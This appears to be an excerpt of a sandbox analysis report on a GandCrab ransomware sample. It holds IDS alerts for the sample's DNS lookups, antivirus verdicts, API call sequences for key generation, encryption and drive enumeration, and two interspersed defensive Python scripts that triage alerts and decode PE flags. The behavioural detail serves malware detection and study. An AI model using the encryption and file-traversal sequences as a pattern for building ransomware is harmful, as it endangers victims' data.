                        08/31/22-23:58:54.651252  2829498  192.168.2.3:65020 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:36.584182  2026737  192.168.2.3:63449 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:03.503720  2026737  192.168.2.3:65201 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:53.997132  2829498  192.168.2.3:60830 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:24.925442  2026737  192.168.2.3:59640 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:50.576561  2026737  192.168.2.3:64123 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:48.220006  2829498  192.168.2.3:50788 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:14.392903  2026737  192.168.2.3:60092 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:27.287358  2026737  192.168.2.3:58124 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:03.462712  2026737  192.168.2.3:65199 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:24.905091  2026737  192.168.2.3:59639 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:46.573613  2026737  192.168.2.3:56953 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:32.344904  2829498  192.168.2.3:58304 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:43.003278  2829498  192.168.2.3:60752 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:20.740564  2026737  192.168.2.3:65514 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:53.975918  2829498  192.168.2.3:60829 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:21.721380  2829498  192.168.2.3:62053 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:02.160962  2026737  192.168.2.3:56621 -> 8.8.8.8:53  UDP       A Network Trojan was detected
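The alert table above is noisy: every DNS query the sample (or the nslookup.exe it spawns) sends leaves from a fresh ephemeral port and trips the same two Emerging Threats rules, so a handful of lookups become dozens of alerts. The script below is an added example, not part of the Joe Sandbox report: it parses a subset of the alerts above (rewritten one per line in a constructed `timestamp SID src:port -> dst:port proto` layout), chains alerts with the same rule, source and destination that fall within a burst window, and reports how many distinct query bursts each SID really represents. The 250 ms window is an assumption chosen to match how the retries in this table cluster.

```python
"""Collapse the report's Snort DNS alerts into per-rule query bursts.

Added example; not part of the Joe Sandbox report. The alert lines are a
subset of the table above in a constructed one-line-per-alert layout.
The 250 ms burst window is an assumption tuned to this table.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Rule names as listed in the Networking section of the report.
RULE_NAMES = {
    2829498: "ETPRO TROJAN GandCrab DNS Lookup 1",
    2026737: "ET TROJAN Observed GandCrab Domain (gandcrab .bit)",
}

# Constructed sample: eleven alerts copied from the table above.
SAMPLE_ALERTS = """\
08/31/22-23:58:15.004694 2026737 192.168.2.3:60584 -> 8.8.8.8:53 UDP
08/31/22-23:58:15.025136 2026737 192.168.2.3:60585 -> 8.8.8.8:53 UDP
08/31/22-23:58:21.699516 2829498 192.168.2.3:62052 -> 8.8.8.8:53 UDP
08/31/22-23:58:21.721380 2829498 192.168.2.3:62053 -> 8.8.8.8:53 UDP
08/31/22-23:58:21.768917 2829498 192.168.2.3:56043 -> 8.8.8.8:53 UDP
08/31/22-23:58:56.731128 2026737 192.168.2.3:53468 -> 8.8.8.8:53 UDP
08/31/22-23:58:56.749513 2026737 192.168.2.3:53469 -> 8.8.8.8:53 UDP
08/31/22-23:58:56.793274 2026737 192.168.2.3:53471 -> 8.8.8.8:53 UDP
09/01/22-00:00:11.330853 2829498 192.168.2.3:52458 -> 8.8.8.8:53 UDP
09/01/22-00:00:11.350932 2829498 192.168.2.3:52459 -> 8.8.8.8:53 UDP
09/01/22-00:00:11.371195 2829498 192.168.2.3:52460 -> 8.8.8.8:53 UDP
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+(?P<sid>\d+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>\w+)$"
)


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


def parse_alerts(text: str) -> list[Alert]:
    """Parse alert lines (unparseable lines are skipped); result is time-ordered."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        alerts.append(Alert(
            ts=datetime.strptime(m["ts"], "%m/%d/%y-%H:%M:%S.%f"),
            sid=int(m["sid"]), src=m["src"], sport=int(m["sport"]),
            dst=m["dst"], dport=int(m["dport"]), proto=m["proto"],
        ))
    return sorted(alerts, key=lambda a: a.ts)


def group_bursts(alerts: list[Alert], window_ms: int = 250) -> list[list[Alert]]:
    """Chain alerts sharing (SID, src, dst, dport) whose gaps stay within the window.

    Every query in the table uses a new ephemeral source port, so the source
    port is deliberately left out of the grouping key.
    """
    window = timedelta(milliseconds=window_ms)
    bursts: list[list[Alert]] = []
    open_burst: dict[tuple, int] = {}  # grouping key -> index into bursts
    for a in alerts:
        key = (a.sid, a.src, a.dst, a.dport)
        idx = open_burst.get(key)
        if idx is not None and a.ts - bursts[idx][-1].ts <= window:
            bursts[idx].append(a)
        else:
            open_burst[key] = len(bursts)
            bursts.append([a])
    return bursts


def summarize(text: str, window_ms: int = 250) -> dict[int, dict]:
    """Per-SID totals: raw alert count, burst count, first and last seen."""
    summary: dict[int, dict] = {}
    for burst in group_bursts(parse_alerts(text), window_ms):
        sid = burst[0].sid
        entry = summary.setdefault(sid, {
            "rule": RULE_NAMES.get(sid, "unknown rule"),
            "alerts": 0, "bursts": 0,
            "first": burst[0].ts, "last": burst[-1].ts,
        })
        entry["alerts"] += len(burst)
        entry["bursts"] += 1
        entry["first"] = min(entry["first"], burst[0].ts)
        entry["last"] = max(entry["last"], burst[-1].ts)
    return summary


if __name__ == "__main__":
    for sid, e in sorted(summarize(SAMPLE_ALERTS).items()):
        print(f"SID {sid} ({e['rule']}): {e['alerts']} alerts in {e['bursts']} bursts, "
              f"{e['first']:%m/%d %H:%M:%S} .. {e['last']:%m/%d %H:%M:%S}")
```

On the eleven constructed alerts this yields two bursts per rule (five and six raw alerts respectively), which is the number an analyst would actually triage; shrinking the window to a millisecond makes every alert its own burst again, which is the behaviour to expect when the same grouping is applied to unrelated traffic.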


                        AV Detection

                        Source: gI5xZdIxUs.exe  Virustotal: Detection: 85%
                        Source: gI5xZdIxUs.exe  Metadefender: Detection: 74%
                        Source: gI5xZdIxUs.exe  ReversingLabs: Detection: 92%
                        Source: gI5xZdIxUs.exe  Avira: detected
                        Source: dns1.soprodns.ru  Virustotal: Detection: 5%
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Avira: detection malicious, Label: TR/Dropper.Gen
                        Source: gI5xZdIxUs.exe  Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Joe Sandbox ML: detected
                        Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack  Avira: Label: TR/Dropper.Gen
                        Source: 14.0.isqmkp.exe.f9d0000.0.unpack  Avira: Label: TR/Dropper.Gen
                        Source: 20.2.isqmkp.exe.f9d0000.0.unpack  Avira: Label: TR/Dropper.Gen
                        Source: 14.2.isqmkp.exe.f9d0000.0.unpack  Avira: Label: TR/Dropper.Gen
                        Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack  Avira: Label: TR/Dropper.Gen
                        Source: 20.0.isqmkp.exe.f9d0000.0.unpack  Avira: Label: TR/Dropper.Gen
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC65880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC682A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC662B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC64950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC68150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC65670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC65210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC66530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D4950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D5880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D62B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D82A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D5210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D5670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D4950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D5880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D62B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D82A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D5210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D5670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree
                        Source: gI5xZdIxUs.exe  Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: gI5xZdIxUs.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH
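The two "Static PE information" lines are the decoded `Characteristics` word of the PE file header and the `DllCharacteristics` word of the optional header. The following script is an added example, not part of the Joe Sandbox report and not derived from the sample itself: `build_sample_header()` constructs a minimal PE32 header in memory that carries exactly the flags listed above (this header is synthetic, not the sample's), and `parse_pe_flags()` decodes any MZ/PE header, so the same function can be pointed at a real file to compare against a sandbox verdict. The set of mitigations it reports as missing (`EXPECTED_MITIGATIONS`) is this script's own choice.

```python
"""Decode the PE header flags a sandbox summarizes as static PE information.

Added example; not part of the Joe Sandbox report and not the sample's
code. build_sample_header() creates a synthetic PE32 header with the flags
the report lists; parse_pe_flags() decodes any MZ/PE header.
"""
import struct

# IMAGE_FILE_* bits of IMAGE_FILE_HEADER.Characteristics (winnt.h).
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0010: "AGGRESIVE_WS_TRIM", 0x0020: "LARGE_ADDRESS_AWARE",
    0x0080: "BYTES_REVERSED_LO", 0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED",
    0x0400: "REMOVABLE_RUN_FROM_SWAP", 0x0800: "NET_RUN_FROM_SWAP", 0x1000: "SYSTEM",
    0x2000: "DLL", 0x4000: "UP_SYSTEM_ONLY", 0x8000: "BYTES_REVERSED_HI",
}
# IMAGE_DLLCHARACTERISTICS_* bits of the optional header (winnt.h).
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
MACHINES = {0x014C: "I386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}
# Loader-enforced mitigations this script expects on a modern binary (its own choice).
EXPECTED_MITIGATIONS = ("DYNAMIC_BASE", "NX_COMPAT", "GUARD_CF")

# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
# SizeOfOptionalHeader, Characteristics
FILE_HEADER = "<HHIIIHH"


def _names(value: int, table: dict) -> list[str]:
    """Flag names for the bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_flags(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    machine, n_sections, _, _, _, opt_size, characteristics = struct.unpack_from(
        FILE_HEADER, data, e_lfanew + 4)
    opt = e_lfanew + 4 + struct.calcsize(FILE_HEADER)
    if opt_size < 72 or opt + opt_size > len(data):
        raise ValueError("optional header too short or truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    # DllCharacteristics sits at optional-header offset 70 for both PE32 and PE32+:
    # PE32+ drops the 4-byte BaseOfData and widens ImageBase to 8 bytes, so later
    # fields keep the same offsets.
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]
    dll_names = _names(dll_characteristics, DLL_CHARACTERISTICS)
    return {
        "machine": MACHINES.get(machine, f"{machine:#06x}"),
        "pe32_plus": magic == 0x20B,
        "sections": n_sections,
        "characteristics": _names(characteristics, CHARACTERISTICS),
        "dll_characteristics": dll_names,
        "missing_mitigations": [m for m in EXPECTED_MITIGATIONS if m not in dll_names],
    }


def build_sample_header(characteristics: int = 0x0102, dll_characteristics: int = 0x0540) -> bytes:
    """Synthetic minimal PE32 header: DOS stub, PE signature, file header, optional header."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    file_hdr = struct.pack(FILE_HEADER, 0x014C, 3, 0, 0, 0, 0xE0, characteristics)
    opt = bytearray(0xE0)                                         # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                         # Magic: PE32
    struct.pack_into("<H", opt, 68, 2)                            # Subsystem: WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_header()
    for key, value in parse_pe_flags(data).items():
        print(f"{key}: {value}")
```

Run without arguments it decodes the synthetic header and reports `DYNAMIC_BASE, NX_COMPAT, NO_SEH` with `GUARD_CF` missing; run with a path it decodes that file. Note that `NO_SEH` is a statement that the image uses no structured exception handlers at all, not a mitigation in the sense that `DYNAMIC_BASE` and `NX_COMPAT` are.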
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: z:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: x:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: v:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: t:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: r:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: p:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: n:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: l:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: j:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: h:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: f:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: b:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: y:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: w:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: u:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: s:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: q:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: o:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: m:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: k:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: i:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: g:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: e:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  File opened: a:
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC66C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe  Code function: 1_2_0FC66A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 14_2_0F9D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe  Code function: 20_2_0F9D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose

                        Networking

                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52957 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52958 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52959 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52960 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60584 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60585 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60586 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60587 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:62052 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:62053 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:62054 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:56043 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59638 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59639 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59640 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59641 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65109 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65110 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65111 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65112 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58693 -> 8.8.8.8:53
